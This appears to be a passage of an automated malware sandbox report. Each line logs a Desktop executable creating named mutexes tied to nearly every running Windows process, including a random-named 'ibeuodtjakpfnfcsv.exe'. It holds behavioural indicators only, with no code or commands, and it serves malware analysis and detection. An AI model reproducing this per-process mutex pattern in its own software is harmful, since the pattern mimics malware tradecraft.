        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6072_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3540_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5852_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1036_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_6380_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4900_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6856_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_6964_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6868_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4912_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_7104_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6180_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5536_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5500_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_436_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2736_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3420_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5960_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_5016_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6136_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1936_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3756_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1048_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6264_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2500_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6240_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2452_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_772_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2440_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1808_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4704_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1640_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_2780_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_824_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4336_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1500_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6360_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_892_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5312_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5772_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1132_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_7084_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1668_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\mousocoreworker.exeM_7272_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_7016_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5412_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3596_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6808_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3112_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5480_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6012_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_6612_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6888_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_376_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6972_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3868_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6500_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\audiodg.exeM_7892_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1656_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4160_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3452_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2308_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3440_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2756_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5416_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_992_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6536_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1360_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_3504_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6204_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3788_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5040_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4060_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3512_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5672_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2424_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ymzwp.exeM_7348_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\upfc.exeM_5740_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3904_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6348_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6208_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1836_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1800_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_8084_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6728_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1160_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6424_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1636_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_936_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1348_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1336_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2200_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_792_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4908_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5064_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2056_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6980_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2884_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4812_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5956_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2860_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6676_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3400_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1392_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_5276_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2700_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6176_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2708_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1504_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_6352_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6224_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1444_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2104_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2044_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2068_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1148_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6920_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1848_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_352_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7480_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3520_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3784_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5680_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1680_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1052_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7412_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_7068_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4632_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1028_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_584_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1968_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wmiadap.exeM_5952_
